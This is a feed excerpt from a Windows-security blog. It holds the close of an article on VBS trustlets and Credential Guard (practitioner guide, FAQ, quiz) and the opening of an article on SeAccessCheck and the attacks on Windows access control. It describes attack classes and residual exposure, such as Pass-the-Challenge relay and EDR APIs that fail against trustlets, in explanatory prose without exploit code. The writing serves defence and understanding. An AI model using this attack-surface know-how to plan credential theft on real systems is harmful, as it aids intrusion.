&lt;p&gt;&lt;strong&gt;5. Administrator Protection transparency.&lt;/strong&gt; As of 10 May 2026, the Administrator Protection feature has been shipped in preview (KB5067036, 28 October 2025), then reverted in the same update note pending a future re-rollout [@kb5067036] [@msdocs-admin-protection]. There is no architecture diagram on the level of Credential Guard&apos;s &quot;how it works&quot; page. There is no published Trustlet ID. There is no public commitment to whether the token issuer is a trustlet, a VBS Enclave, or something else inside the new security boundary. For a feature that materially changes the local-elevation model of Windows, that is unusual reticence.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;6. Cross-architecture portability.&lt;/strong&gt; A workload that wants to run as a trustlet on Windows, a Confidential VM on Linux, a Trusted Application on ARM, and a Secure Enclave Application on Apple silicon must, today, be written four times. GlobalPlatform&apos;s TEE Client API standardises one side of TrustZone, the Open Enclave SDK abstracts a subset of SGX and TrustZone, and VBS Enclaves do their own thing. No universal portable TEE API exists. For workloads where portability matters more than peak isolation, this is the open problem with the most direct commercial pressure behind it.&lt;/p&gt;

Two answers, both incomplete. The defensive answer: an enumerated trustlet list is an attacker&apos;s targeting list, and Microsoft prefers not to publish targeting lists for components whose exact attack surface is still under active study. The historical answer: the 2015 list was a side-effect of Ionescu reverse-engineering Windows 10 RTM. There has been no comparable public reverse-engineering push for any post-2015 Windows release at the same level of completeness, and Microsoft has not chosen to fill the gap with first-party documentation. Empirical enumeration via `NtQuerySystemInformation(SystemIsolatedUserModeInformation)` works on a live system, but doing it on every Windows 11 servicing build is a research programme, not a citation.
&lt;p&gt;These are questions a researcher with a year of grant time could move the field on. The next section is the question a practitioner has today.&lt;/p&gt;
&lt;h2&gt;10. Practitioner Guide&lt;/h2&gt;
&lt;p&gt;What changes in a real workflow once you know what a trustlet is? Four short answers.&lt;/p&gt;
&lt;h3&gt;Windows administrator&lt;/h3&gt;
&lt;p&gt;Verify Credential Guard is actually running before you assume it is. Two ways.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; &lt;strong&gt;GUI:&lt;/strong&gt; Run &lt;code&gt;msinfo32&lt;/code&gt; and check &lt;em&gt;Virtualization-based security Services Running&lt;/em&gt;. You should see at least &quot;Credential Guard&quot; and ideally &quot;Hypervisor enforced Code Integrity.&quot; &lt;strong&gt;PowerShell:&lt;/strong&gt; &lt;code&gt;Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard&lt;/code&gt;. The properties &lt;code&gt;SecurityServicesRunning&lt;/code&gt; and &lt;code&gt;VirtualizationBasedSecurityStatus&lt;/code&gt; are the load-bearing ones; values of 1 and 2 respectively indicate Credential Guard is running with VBS in full enforcement [@msdocs-credential-guard].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Enumerating live trustlets on a 2026 box requires more care than enumerating ordinary processes. Process Explorer&apos;s &lt;em&gt;Image&lt;/em&gt; tab carries an IUM marker for trustlet processes. SysInternals Sigcheck on a candidate binary surfaces the Signing Level. The Microsoft Learn IUM page is explicit that &lt;em&gt;&quot;other APIs, such as CreateRemoteThread, VirtualAllocEx, and Read/WriteProcessMemory will also not work as expected when used against Trustlets&quot;&lt;/em&gt; [@msdocs-ium] -- the same APIs many EDR products rely on for behavioural monitoring will silently fail or report sentinel values when targeted at a trustlet. Plan detections accordingly.&lt;/p&gt;
&lt;h3&gt;Security researcher&lt;/h3&gt;
&lt;p&gt;The Quarkslab blog post &quot;Debugging Windows Isolated User Mode (IUM) Processes&quot; is the canonical recipe for attaching to a trustlet under nested virtualisation [@quarkslab-debug-ium]. The empirical enumeration path is &lt;code&gt;NtQuerySystemInformation&lt;/code&gt; with class &lt;code&gt;SystemIsolatedUserModeInformation&lt;/code&gt;; the structure returned includes a count of running trustlets and their identifying metadata.The driver-side pattern Microsoft documents for &quot;is this process a trustlet?&quot; reads the &lt;code&gt;IsSecureProcess&lt;/code&gt; flag from &lt;code&gt;PROCESS_EXTENDED_BASIC_INFORMATION&lt;/code&gt;, queried through &lt;code&gt;ZwQueryInformationProcess&lt;/code&gt; with &lt;code&gt;ProcessBasicInformation&lt;/code&gt;; the IUM page presents this as sample code, not a callable &lt;code&gt;IsSecureProcess&lt;/code&gt; API. Tools that need to behave differently against trustlets (memory scanners, integrity checkers, EDR sensors) should use that documented query rather than parsing process attributes by hand [@msdocs-ium].&lt;/p&gt;
&lt;h3&gt;Application developer (VBS Enclaves)&lt;/h3&gt;
&lt;p&gt;If you are writing third-party code that needs trustlet-class isolation, the primitive you target is a VBS Enclave, not a trustlet. The toolchain is specific:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Visual Studio 2022 version 17.9 or later.&lt;/li&gt;
&lt;li&gt;Windows SDK version 10.0.22621.3233 or later (provides &lt;code&gt;veiid.exe&lt;/code&gt;, the VBS Enclave import ID binding utility, and &lt;code&gt;signtool.exe&lt;/code&gt;).&lt;/li&gt;
&lt;li&gt;A Trusted Signing account for production signing [@msdocs-vbs-enclaves].&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The architectural rule is &lt;em&gt;never trust the host&lt;/em&gt;. The host process&apos;s address space is reachable by the enclave; the enclave&apos;s address space is not reachable by the host. Range-validate every pointer the host hands the enclave; copy before you check (so the host cannot mutate the data between your check and your use); avoid TOCTOU windows. Microsoft&apos;s &quot;Everything Old Is New Again&quot; post is explicit that this is the hardening surface researchers are looking at right now [@ms-everything-old].&lt;/p&gt;
&lt;p&gt;The development guide includes a sample with a comment that captures the discipline:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Every DLL loaded in an enclave requires a configuration. This configuration is defined using a global const variable named __enclave_config of type IMAGE_ENCLAVE_CONFIG... // DO NOT SHIP DEBUGGABLE ENCLAVES TO PRODUCTION [@msdocs-vbs-enclaves-dev-guide].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The &lt;code&gt;IMAGE_ENCLAVE_POLICY_DEBUGGABLE&lt;/code&gt; flag is for development only. The &lt;code&gt;VbsEnclaveTooling&lt;/code&gt; repository on GitHub provides a NuGet package and a code generator that make the cross-VTL marshalling less error-prone, plus reference documentation including &lt;code&gt;Edl.md&lt;/code&gt;, &lt;code&gt;HelloWorldWalkthrough.md&lt;/code&gt;, and &lt;code&gt;CodeGeneration.md&lt;/code&gt; [@vbs-enclave-tooling].&lt;/p&gt;

1. Confirm OS support: Windows 11 Build 26100.2314+ or Windows Server 2025+ [@msdocs-vbs-enclaves].
2. Install Visual Studio 2022 17.9+ and Windows SDK 10.0.22621.3233+.
3. Acquire a Trusted Signing account; configure `signtool.exe` for it.
4. Define `__enclave_config` as `IMAGE_ENCLAVE_CONFIG`; set family/image/SVN fields.
5. Use `veiid.exe` to bind import IDs.
6. Sign the enclave DLL with `signtool.exe` and the Trusted Signing certificate.
7. Test with `IMAGE_ENCLAVE_POLICY_DEBUGGABLE` set; remove it before production.
8. Range-validate every host-supplied pointer; copy before check.
&lt;h3&gt;Defender&lt;/h3&gt;
&lt;p&gt;Know what Credential Guard does &lt;em&gt;not&lt;/em&gt; protect, because that is where most exposure remains.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The trustlet protects memory-resident NTLM hashes and Kerberos TGTs from a VTL0 kernel attacker. It does not protect: - Supplied credentials at the logon prompt (keyloggers, screen-scrapers, hardware shimming). - The agent RPC channel (Pass-the-Challenge-class relay against &lt;code&gt;lsass.exe&lt;/code&gt; is reachable from VTL0) [@lyak-pass-the-challenge]. - Protocols that require a usable secret in plaintext: CredSSP, NTLMv1, MS-CHAPv2, Digest. These are unsupported with the trustlet-protected token by design [@msdocs-credential-guard]. - Liveness: a VTL0 kernel attacker can stop talking to VTL1 and prevent the trustlet from being available. Denial of service is out of the VBS threat model [@amar-bh2020]. The summary: trustlets shrink the credential-theft attack surface, they do not eliminate it.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The trustlet model is finite, audited, and useful. Use the lock; do not assume the lock is the only thing on the door.&lt;/p&gt;
&lt;h2&gt;11. Frequently asked questions&lt;/h2&gt;

No. Protected Process Light (PPL) and trustlets sit in the same lineage but differ at the architectural level. A PPL is enforced by the NT kernel, which is also the attacker&apos;s likely foothold; itm4n&apos;s 2021 PPLdump showed the result over eight years of LSASS-as-PPL deployment [@itm4n-runasppl]. A trustlet is enforced by the Hyper-V hypervisor and the Secure Kernel, both running in a different Virtual Trust Level from the NT kernel; a VTL0 kernel write primitive does not touch the trustlet&apos;s pages [@quarkslab-debug-ium]. The signing-level lattice is similar (both rely on Signature Level 12); the enforcement architecture is not.

Not directly. Inbox trustlets require the Microsoft IUM EKU (`1.3.6.1.4.1.311.10.3.37`), which Microsoft does not grant to third parties [@ionescu-bh2015]. Since Windows 11 24H2, the third-party-shippable equivalent is a VBS Enclave: a DLL signed with a Trusted Signing certificate, loaded into an enclave region of a host process via `CreateEnclave` and `CallEnclave`. The architectural threat model is identical (the host is the attacker, the enclave is the defender); the API surface and the enclave-versus-process model differ. VBS Enclaves require Windows 11 Build 26100.2314 or later, Windows SDK 10.0.22621.3233 or later, Visual Studio 2022 17.9 or later, and a Trusted Signing account [@msdocs-vbs-enclaves].

No. It means that the *memory-resident* NTLM hash or Kerberos TGT cannot be read out of `LsaIso.exe` by a VTL0 kernel attacker. It does not mean credentials are unstealable. Section 10 enumerates the four classes of residual exposure -- typed-in credentials, the agent-side RPC relay (Pass-the-Challenge) [@lyak-pass-the-challenge], plaintext-secret protocols (CredSSP / NTLMv1 / MS-CHAPv2 / Digest are unsupported with the trustlet-protected token), and liveness (denial of service against VTL1 is out of the VBS threat model) -- with citations [@msdocs-credential-guard] [@amar-bh2020].

For that trustlet, yes; for the model, by design. The Secure Kernel plus trustlets are the VBS TCB. Amar and King&apos;s 2020 work demonstrated practical VTL0-to-VTL1 vulnerabilities (CVE-2020-0917, CVE-2020-0918) [@amar-bh2020] [@nvd-cve-2020-0917] [@nvd-cve-2020-0918]; Microsoft hardened in response, moving the Secure Kernel pool to segment heap, reducing four W+X regions to +X only, and introducing `SkpgContext` HyperGuard for VTL1 [@amar-bh2020]. The surface remains finite and audited; the trustlet model is hypervisor-strong against the VTL0 kernel and not stronger than the substrate it sits on.

Not on ESS-capable systems. The Microsoft Learn page is clear that *&quot;when ESS is enabled, the face algorithm is protected using VBS to isolate it from the rest of Windows... The hypervisor is used to specify and protect memory regions, so that they can only be accessed by processes running in VBS&quot;* [@msdocs-ess]. The biometric *template* is encrypted with VBS-only keys and lives in VBS-isolated memory. The TPM still has a role -- it holds the per-user Hello *private keys* that authenticate against the local credential provider -- but the biometric template itself does not live in the TPM [@msdocs-tpm].

No. The Microsoft Learn page describes the new model: an authorised user triggers a Windows Hello-backed prompt; Windows then *&quot;uses a hidden, system-generated, profile-separated user account to create an isolated admin token. This token is issued to the requesting process and is destroyed once the process ends&quot;* [@msdocs-admin-protection]. The in-session prompt is still there; the elevated token&apos;s *origin* is what changed (from a split-token impersonation of the same account to a transient system-generated admin account). The October 2025 preview shipped in KB5067036 and was then reverted in the same update note pending a future rollout [@kb5067036]. As of 10 May 2026 the feature is not generally available.
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;vbs-trustlets-what-actually-runs-in-the-secure-kernel&quot; keyTerms={[
  { term: &quot;Trustlet&quot;, definition: &quot;A user-mode process running in VTL1 user mode, scheduled by the Secure Kernel, isolated from VTL0 by per-VTL SLAT permissions. Defined by passing five load-time gates.&quot; },
  { term: &quot;Virtual Trust Level (VTL)&quot;, definition: &quot;A hypervisor-managed privilege axis added on top of x86 rings. Currently two VTLs are implemented out of an architecturally supported sixteen.&quot; },
  { term: &quot;Isolated User Mode (IUM)&quot;, definition: &quot;Ring 3 of VTL1. The user-mode environment trustlets run in. Restricted to about 48 of NT&apos;s ~480 syscalls.&quot; },
  { term: &quot;Secure Kernel&quot;, definition: &quot;The kernel that runs in VTL1 ring 0. Schedules trustlets, parses .tpolicy sections, enforces SkCapabilities rules on secure-call invocations.&quot; },
  { term: &quot;IUM EKU&quot;, definition: &quot;The Enhanced Key Usage OID 1.3.6.1.4.1.311.10.3.37. Required alongside the Windows System Component Verification EKU for a binary to be loaded as a trustlet at Signature Level 12.&quot; },
  { term: &quot;Trustlet Instance GUID&quot;, definition: &quot;A runtime identifier the Secure Kernel uses to scope per-instance secrets. Set via IumSetTrustletInstance; shared between cooperating trustlets (e.g., vmsp.exe and the vTPM provisioning trustlet) so they can read each other&apos;s storage blobs under SkCapabilities control.&quot; },
  { term: &quot;Malwarelet&quot;, definition: &quot;Ionescu&apos;s term for an attacker-controlled trustlet, enabled by a Test Signing or Secure Boot compromise rather than by a trustlet-internal bug.&quot; },
  { term: &quot;ALPC&quot;, definition: &quot;Advanced Local Procedure Call: Windows IPC primitive used by VTL0 agent processes to communicate with their VTL1 trustlet counterparts.&quot; }
]} questions={[
  { q: &quot;Name the five gates a Windows binary must pass at load time to become a trustlet.&quot;, a: &quot;(1) PsAttributeSecureProcess process attribute with a 64-bit Trustlet ID. (2) Two EKUs at Signature Level 12: Windows System Component Verification (1.3.6.1.4.1.311.10.3.6) and IUM (1.3.6.1.4.1.311.10.3.37). (3) A .tpolicy PE section exporting s_IumPolicyMetadata with matching Trustlet ID. (4) A Trustlet Instance GUID bound via IumSetTrustletInstance. (5) The stripped-down LdrpIsSecureProcess loader path.&quot; },
  { q: &quot;Why does a SYSTEM-privilege NT-kernel write primitive on Windows 11 25H2 fail to read LsaIso.exe memory?&quot;, a: &quot;Because the NT kernel runs in VTL0, LsaIso.exe runs in VTL1, and the Hyper-V hypervisor configures per-VTL SLAT entries that refuse VTL0 read access to VTL1-only pages. The attacker&apos;s kernel write primitive can edit NT kernel structures but cannot change the hypervisor-managed SLAT entries.&quot; },
  { q: &quot;What does Pass-the-Challenge demonstrate about the limits of Credential Guard?&quot;, a: &quot;That while the NTLM hash itself never leaves VTL1, the agent process (lsass.exe in VTL0) can be asked to ask the trustlet to compute an authentication response for an attacker-supplied challenge. The resulting response is reachable by the VTL0 attacker and is sufficient for many relay attacks. The hash is protected; the authentication outcomes it produces are not.&quot; },
  { q: &quot;What is the practical floor of the trustlet attack surface that Amar and King exposed at Black Hat USA 2020?&quot;, a: &quot;The secure-call interface (IumInvokeSecureService) parses VTL0-controlled inputs in VTL1. Hyperseed retargeted at it found five VTL0-&amp;gt;VTL1 bugs in two weeks, including CVE-2020-0917 (OOB read in the secure-call surface) and CVE-2020-0918 (SkmmUnmapMdl design flaw). Microsoft responded with segment-heap migration, W+X reduction, and SkpgContext (Secure Kernel HyperGuard).&quot; },
  { q: &quot;What is the third-party equivalent of an inbox trustlet on Windows 11 24H2 and later?&quot;, a: &quot;A VBS Enclave: a DLL signed with a Trusted Signing certificate and loaded into an enclave region of a host process via CreateEnclave / CallEnclave. Requires Windows 11 Build 26100.2314 or later, Windows SDK 10.0.22621.3233 or later, and Visual Studio 2022 17.9 or later.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>windows-security</category><category>vbs</category><category>trustlets</category><category>credential-guard</category><category>hyper-v</category><category>secure-kernel</category><category>isolated-user-mode</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>&quot;Can This Code Do This?&quot; -- Twenty-Five Years of Attacks on the Windows Access-Control Model</title><link>https://paragmali.com/blog/windows-access-control-25-years-of-attacks/</link><guid isPermaLink="true">https://paragmali.com/blog/windows-access-control-25-years-of-attacks/</guid><description>How a single kernel function, SeAccessCheck, decides every Windows operation -- and how Mimikatz, the Potato lineage, and seventy UAC bypasses each attack one of its inputs.</description><pubDate>Sun, 10 May 2026 00:00:00 GMT</pubDate><content:encoded>
Windows answers the question *can this code do this?* with one kernel function, `SeAccessCheck`, evaluated against five inputs: a security descriptor, an access token, a desired-access mask, a generic-mapping table, and any previously-granted access. The function and its inputs have not structurally changed since July 27, 1993. Every famous Windows local-privilege-escalation tool of the last twenty-five years -- Mimikatz, JuicyPotato and seven other Potatoes, the seventy AutoElevate-redirect methods catalogued in UACMe -- attacks one of those inputs. This article tells that story as one system, names the five structural limits Microsoft has publicly conceded, and explains why Adminless, NTLMless, VBS Trustlets, and Credential Guard are the four non-overlapping ways to close them.
&lt;h2&gt;1. One Question, Billions of Times a Second&lt;/h2&gt;
&lt;p&gt;Open a Windows PowerShell window and run &lt;code&gt;whoami /priv&lt;/code&gt;. Read the column on the right. &lt;code&gt;SeShutdownPrivilege&lt;/code&gt;. &lt;code&gt;SeUndockPrivilege&lt;/code&gt;. &lt;code&gt;SeIncreaseWorkingSetPrivilege&lt;/code&gt;. &lt;code&gt;SeTimeZonePrivilege&lt;/code&gt;. About twenty rows of capabilities, almost all marked &lt;em&gt;Disabled&lt;/em&gt;, on a token that lives inside &lt;code&gt;explorer.exe&lt;/code&gt;&apos;s memory and that the kernel consults billions of times a second.&lt;/p&gt;
&lt;p&gt;Now run &lt;code&gt;icacls C:\Windows\System32\drivers\etc\hosts&lt;/code&gt;. The output reads &lt;code&gt;BUILTIN\Administrators:(F)&lt;/code&gt;, &lt;code&gt;NT AUTHORITY\SYSTEM:(F)&lt;/code&gt;, &lt;code&gt;BUILTIN\Users:(R)&lt;/code&gt;. Six characters per principal, decoded by something inside the kernel called &lt;code&gt;SeAccessCheck&lt;/code&gt;, applied to a data structure called a security descriptor, against a credential called an access token, every time any process anywhere on the machine asks for read access to that single file [@ms-learn-access-control].&lt;/p&gt;
&lt;p&gt;This article is about the model behind those two outputs. A model that has not structurally changed since July 27, 1993, when Windows NT 3.1 shipped from Redmond [@en-wiki-windows-nt-3-1]. A model that every famous Windows local-privilege-escalation tool of the last twenty-five years -- Mimikatz, JuicyPotato, fodhelper.exe, the seventy methods in the open-source UACMe catalogue -- exists to attack [@github-gentilkiwi-mimikatz, @github-ohpe-juicy-potato, @github-hfiref0x-uacme].&lt;/p&gt;
&lt;p&gt;The thesis comes in three convictions:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;SeAccessCheck&lt;/code&gt; is the answer.&lt;/strong&gt; Every securable Windows operation that touches a securable object resolves through one decision function with one set of inputs [@ms-learn-how-dacls-control-access].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Every famous Windows escalation tool attacks one of those inputs.&lt;/strong&gt; JuicyPotato attacks the token. Mimikatz attacks the privilege list. Fodhelper attacks the elevation flow that produces the token. HiveNightmare attacks the DACL on a single file [@nvd-cve-2021-36934]. The vocabulary scales.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;The model has five structural limits its keepers have publicly conceded&lt;/strong&gt; [@msrc-servicing-criteria], and Adminless, NTLMless, VBS Trustlets, and Credential Guard are the four non-overlapping ways to close them.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The forecast for the next 14,000 words: ten primitives (the Security Reference Monitor, security identifiers, tokens, security descriptors, DACLs, SACLs, ACEs, privileges, Mandatory Integrity Control, User Account Control), one canonical oracle (&lt;code&gt;SeAccessCheck&lt;/code&gt;), two attack families (the Potato lineage and the UACMe bypass tradition), and four successor architectures (Adminless, NTLMless, VBS Trustlets, Credential Guard).&lt;/p&gt;
&lt;p&gt;If the model has not structurally changed since 1993, why has it taken thirty-three years and seventy bypasses to map its failure modes -- and what does each generation tell us about the next?&lt;/p&gt;
&lt;h2&gt;2. Origins: From Lampson&apos;s Matrix to Cutler&apos;s Kernel (1971-1993)&lt;/h2&gt;
&lt;p&gt;The vocabulary starts in a paper Butler Lampson presented at Princeton in 1971 and the ACM republished in &lt;em&gt;Operating Systems Review&lt;/em&gt; in January 1974. Lampson framed protection as a 2-D matrix: rows index the &lt;em&gt;subjects&lt;/em&gt; (users, processes), columns index the &lt;em&gt;objects&lt;/em&gt; (files, devices, memory pages), and the cell at the intersection holds the &lt;em&gt;operations&lt;/em&gt; the subject is permitted on the object. The matrix is a sparse, mostly-empty table the size of every-process times every-file. No real system has ever stored it that way.&lt;/p&gt;
&lt;p&gt;Two implementation strategies fall out of the formalism. Slice the matrix by row and you get &lt;em&gt;capability lists&lt;/em&gt;: each subject carries a token that names the objects it can touch. Slice by column and you get &lt;em&gt;access-control lists&lt;/em&gt;: each object carries a list of subjects allowed to touch it. Lampson worked through both in the paper. Operating systems built on the second slice came to dominate, partly because hardware in 1971 made unforgeable capabilities expensive, partly because file systems could carry an ACL at the inode without changing every program. Decades later, the gap between the two implementations would still matter; we will reach Norm Hardy&apos;s &quot;Confused Deputy&quot; in a moment.&lt;/p&gt;
&lt;p&gt;The lever that turned theory into Windows came from procurement, not academia. On December 26, 1985, the U.S. Department of Defense published &lt;code&gt;DoD 5200.28-STD&lt;/code&gt;, the &lt;em&gt;Trusted Computer System Evaluation Criteria&lt;/em&gt;, known by the colour of its cover as the Orange Book [@nist-csrc-rainbow]. The Orange Book defined four divisions of trusted-system assurance, and its C2 class -- &quot;Controlled Access Protection&quot; -- made discretionary access control plus auditing a federal procurement floor. The September 30, 1987 Neon Orange Book (NCSC-TG-003) and the July 28, 1987 Tan Book (NCSC-TG-001) elaborated DAC and audit respectively [@nist-csrc-rainbow]. After 1985, no operating system that wanted U.S. federal customers could ship without per-user ACLs and an audit log.&lt;/p&gt;
&lt;p&gt;A year before the Orange Book ossified DAC into procurement, Norm Hardy of the Tymshare / KeyKOS lineage published a three-page paper in &lt;em&gt;Operating Systems Review&lt;/em&gt; that named the structural limit of the entire ACL-shaped class: &quot;The Confused Deputy (or why capabilities might have been invented)&quot; [@wayback-cap-lore-hardy]. Hardy described a privileged compiler that wrote billing records to a system file. A user could trick the compiler into writing the user&apos;s &lt;em&gt;output&lt;/em&gt; file over the billing file, because the compiler used &lt;em&gt;its own&lt;/em&gt; authority on every write and could not distinguish &quot;authority I have&quot; from &quot;authority the caller asked me to use.&quot;&lt;/p&gt;
&lt;p&gt;The Wikipedia summary of the field is exact: &quot;Capability systems protect against the confused deputy problem, whereas access-control list-based systems do not&quot; [@en-wiki-confused-deputy]. Hold this paper. It will come back in Section 10.&lt;/p&gt;

The team that built Windows NT was not assembled in Redmond. David Cutler arrived in October 1988 from Digital Equipment Corporation [@en-wiki-cutler], where he had led VMS and the cancelled Mica successor, and brought with him a fraction of his old DEC team.&lt;p&gt;The cultural import mattered: VAX/VMS, announced October 25, 1977 alongside the VAX-11/780 (V1.0 shipped August 1978) [@en-wiki-openvms], introduced UIC-based file protection and a kernel-mode security architecture, and by the mid-1980s the VAX/VMS line had been evaluated at TCSEC Class C2 [@en-wiki-openvms], by which time the system had been hardened with per-object ACLs, audit channels, and an explicit reference monitor. That C2-hardened VMS was the cultural reference Cutler brought with him to Microsoft. G. Pascal Zachary&apos;s &lt;em&gt;Showstopper!&lt;/em&gt; tells the story of the four-year build of NT 3.1 from that team [@showstopper-zachary].&lt;/p&gt;
&lt;p&gt;The point for this article is narrower. NT 3.1&apos;s nine access-control primitives -- Security Reference Monitor, security identifier, access token, security descriptor, DACL, SACL, ACE, privileges, audit channel -- did not arrive piecemeal. They were specified together, before the first line of &lt;code&gt;SeAccessCheck&lt;/code&gt; was written, against a procurement standard the team intended to clear.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;p&gt;NT 3.1 released to manufacturing on July 27, 1993 [@en-wiki-windows-nt-3-1]. NT 3.5, released to manufacturing on September 21, 1994 [@en-wiki-nt-3-5], was hardened through Service Pack 3 (June 21, 1995) and was rated by the National Security Agency in July 1995 as complying with TCSEC C2 criteria against the standalone single-user configuration [@en-wiki-nt-3-5]; NT 4.0 Service Pack 6a was evaluated at TCSEC C2 in a standalone (non-networked) configuration, consistent with NT 3.5 SP3. The combination froze the model. Once C2 evaluation was on the books, structural changes to the access-control surface would have required re-evaluation. Federal procurement obligations have kept the structural shape intact in the thirty-one years since that 1995 C2 rating, even after the Department of Defense formally retired TCSEC in favour of the Common Criteria.&lt;/p&gt;
&lt;p&gt;Cutler shipped a model that has answered &quot;can this code do this?&quot; the same way for thirty-three years. What is the actual function -- and what are its inputs?&lt;/p&gt;
&lt;h2&gt;3. The Kernel Oracle: &lt;code&gt;SeAccessCheck&lt;/code&gt; and Its Inputs&lt;/h2&gt;
&lt;p&gt;The function has one signature, one return value, and one job. Microsoft&apos;s Win32 documentation exposes a user-mode mirror called &lt;code&gt;AccessCheck&lt;/code&gt; that lets userland code ask the question without holding a handle, and a kernel routine called &lt;code&gt;SeAccessCheck&lt;/code&gt; that the kernel invokes at every securable operation [@ms-learn-access-control, @ms-learn-access-tokens]. The shape is the same in both directions:&lt;/p&gt;
&lt;p&gt;$$
\textsf{SeAccessCheck}(\textit{SD}, \textit{Token}, \textit{DesiredAccess}) \to (\textit{GrantedAccess}, \textit{Status})
$$&lt;/p&gt;
&lt;p&gt;Three inputs in (a security descriptor, an access token, a requested-access mask), two outputs out (the access mask actually granted, and a &lt;code&gt;STATUS_ACCESS_DENIED&lt;/code&gt; flavour if any). Two more hidden inputs make the kernel signature precise: a &lt;em&gt;generic mapping&lt;/em&gt; table that translates the four generic rights (&lt;code&gt;GENERIC_READ&lt;/code&gt;, &lt;code&gt;GENERIC_WRITE&lt;/code&gt;, &lt;code&gt;GENERIC_EXECUTE&lt;/code&gt;, &lt;code&gt;GENERIC_ALL&lt;/code&gt;) into object-type-specific bits, and a &lt;em&gt;previously-granted-access&lt;/em&gt; mask that the kernel carries forward when an access check happens in two phases. Together: five inputs, one decision, one log entry (the documented kernel routine carries a few additional parameters of kernel-internal bookkeeping -- a synchronization flag, an &lt;code&gt;AccessMode&lt;/code&gt; discriminator that elides the check for kernel-mode callers, and a privileges out-parameter -- which the explanatory five-input model collapses; the user-mode &lt;code&gt;AccessCheck&lt;/code&gt; mirror is closer to the model the article uses).&lt;/p&gt;

The kernel-mode component of the Windows NT executive that performs all access checks against securable objects. It owns `SeAccessCheck` and the audit log generation routines. The SRM is a *subsystem*, not a feature: every other kernel component that needs to grant or deny access calls into it.

The Windows kernel routine that decides whether a thread may perform a requested set of operations on an object. It takes a security descriptor, an access token, a desired-access mask, a per-object-type generic-mapping table, and any previously-granted access. (The documented kernel signature also carries a synchronization flag, an `AccessMode` discriminator that elides the check for kernel-mode callers, and a privileges out-parameter; the five-input model used here is an explanatory simplification that the user-mode `AccessCheck` mirror tracks more closely.) It returns the subset of the desired-access mask that the kernel grants and a status code. Every call site that opens or modifies a securable object eventually reaches this function [@ms-learn-how-dacls-control-access].
&lt;p&gt;The five inputs are not equally exotic. The desired-access mask and the generic-mapping table are bookkeeping that an object type defines once at registration time. The previously-granted-access input is the kernel handing itself a pencil for two-phase access checks, mostly invisible to userland. The two inputs the rest of the article will keep returning to are the security descriptor and the access token.&lt;/p&gt;
&lt;p&gt;A &lt;em&gt;security descriptor&lt;/em&gt; is the data structure attached to the object. It carries an owner SID, a primary-group SID, a discretionary access-control list (DACL) of allow / deny / audit entries, and a system access-control list (SACL) holding audit and integrity-label entries [@ms-learn-mic]. The DACL is what &lt;code&gt;icacls&lt;/code&gt; prints. The SACL is what writes Event Log entries when something the descriptor&apos;s writer wanted to watch happens.&lt;/p&gt;
&lt;p&gt;An &lt;em&gt;access token&lt;/em&gt; is the data structure attached to the caller. It names the user (one SID), the user&apos;s groups (a list of SIDs), the privileges the user holds (a list of named superpowers), the integrity level the kernel will compare against the object&apos;s label, and a flag that says whether the token is a &lt;em&gt;primary&lt;/em&gt; token (one per process) or an &lt;em&gt;impersonation&lt;/em&gt; token (one per thread, used to act on a client&apos;s behalf) [@ms-learn-access-tokens].&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s documentation lists the token&apos;s contents almost as bullet points: &quot;The security identifier (SID) for the user&apos;s account; SIDs for the groups of which the user is a member; A logon SID that identifies the current logon session; A list of the privileges held by either the user or the user&apos;s groups; An owner SID; The SID for the primary group; The default DACL; ... Whether the token is a primary or impersonation token; An optional list of restricting SIDs; Current impersonation levels...&quot; [@ms-learn-access-tokens].&lt;/p&gt;
&lt;p&gt;The flow inside &lt;code&gt;SeAccessCheck&lt;/code&gt; is mechanical. The kernel maps &lt;code&gt;DesiredAccess&lt;/code&gt; from generic to specific bits using the type&apos;s mapping table. It checks the integrity label of the object against the integrity level on the token (Mandatory Integrity Control runs &lt;em&gt;before&lt;/em&gt; the DACL walk, a point Section 7 expands). It walks the DACL in order, deny-first, accumulating bits granted by allow ACEs whose SID is in the token&apos;s list. It applies the privilege grants &lt;code&gt;SeAccessCheck&lt;/code&gt; itself honors, &lt;code&gt;SeTakeOwnershipPrivilege&lt;/code&gt; (which yields &lt;code&gt;WRITE_OWNER&lt;/code&gt;) and &lt;code&gt;SeSecurityPrivilege&lt;/code&gt; (which yields &lt;code&gt;ACCESS_SYSTEM_SECURITY&lt;/code&gt;); the broader DACL-bypass privileges are token-borne but enforced elsewhere, &lt;code&gt;SeBackupPrivilege&lt;/code&gt;/&lt;code&gt;SeRestorePrivilege&lt;/code&gt; at file open with backup semantics, and &lt;code&gt;SeDebugPrivilege&lt;/code&gt; at process open. It returns the accumulated &lt;code&gt;GrantedAccess&lt;/code&gt;, or &lt;code&gt;STATUS_ACCESS_DENIED&lt;/code&gt; if the requested bits were not all granted.&lt;/p&gt;

sequenceDiagram
    participant App as User-mode caller
    participant ObjMgr as Object Manager
    participant SRM as Security Reference Monitor
    participant Audit as Audit channel
    App-&amp;gt;&amp;gt;ObjMgr: OpenObject(name, DesiredAccess, ImpersonationToken)
    ObjMgr-&amp;gt;&amp;gt;ObjMgr: Resolve name (\BaseNamedObjects, \Device, \??)
    ObjMgr-&amp;gt;&amp;gt;ObjMgr: Fetch security descriptor from object header
    ObjMgr-&amp;gt;&amp;gt;SRM: SeAccessCheck(SD, Token, DesiredAccess)
    SRM-&amp;gt;&amp;gt;SRM: Map generic rights via type mapping
